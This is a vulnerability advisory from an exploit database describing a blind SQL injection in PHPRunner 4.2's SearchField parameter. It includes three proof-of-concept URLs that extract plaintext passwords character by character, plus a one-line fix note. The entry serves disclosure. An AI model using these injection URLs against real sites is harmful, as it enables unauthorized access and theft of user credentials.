PHPRunner 4.2 (SearchOption) Blind SQL Injection Vulnerability

2009-03-17T00:00:00
ID 1337DAY-ID-4936
Type zdt
Reporter 0day Today Team
Modified 2009-03-17T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==============================================================
PHPRunner 4.2 (SearchOption) Blind SQL Injection Vulnerability
==============================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0                          
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1


##################################################################
#
#        AmnPardaz Security Research Team
#
# Title:        PHPRunner SQL Injection
# Vendor:        http://www.xlinesoft.com
# Vulnerable Version:    4.2 (prior versions also may be affected)
# Exploitation:        Remote with browser
# Fix:            N/A
###################################################################

####################
- Description:
####################

PHPRunner builds visually appealing web interface for popular databases. Your web site visitors will be able to easily search, add, edit, delete and exprt

data in MySQL, Oracle, SQL Server, MS Access, and Postgre databases.

####################
- Vulnerability:
####################

Input passed to the "SearchField" parameters in "UserView_list.php" is not properly sanitised before being used in SQL queries.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Vulnerable Pages: 'orders_list.php' , 'users_list.php' , 'Administrator_list.php'


####################
- PoC:
####################

Its possible to obtain plain text passwords from database by blind fishing exploit

http://example.com/output/UserView_list.php?a=search&value=1&SearchFor=abc&SearchOption=Contains&SearchField=Password like '%%')--
http://example.com/output/UserView_list.php?a=search&value=1&SearchFor=abc&SearchOption=Contains&SearchField=mid(Password,1,1)='a')--
http://example.com/output/UserView_list.php?a=search&value=1&SearchFor=abc&SearchOption=Contains&SearchField=mid(Password,1,2)='ab')--

####################
- Solution:
####################

Edit the source code to ensure that inputs are properly sanitized.

####################




#  0day.today [2017-12-31]  #